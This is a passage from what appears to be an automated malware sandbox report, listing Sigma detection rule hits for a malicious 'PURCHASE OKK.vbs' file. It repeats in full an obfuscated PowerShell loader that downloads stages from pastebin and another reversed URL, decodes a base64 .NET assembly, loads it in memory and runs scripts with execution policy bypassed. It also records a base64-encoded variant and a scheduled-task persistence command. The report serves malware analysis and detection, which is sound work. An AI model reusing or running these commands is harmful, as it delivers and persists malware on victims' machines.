-Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8
?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ProcessId: 8040, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ProcessId: 8040, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", ProcessId: 7588, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7588, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos, ProcessId: 7720, ProcessName: schtasks.exe
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' 
;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPower
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs", ProcessId: 7588, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?Z
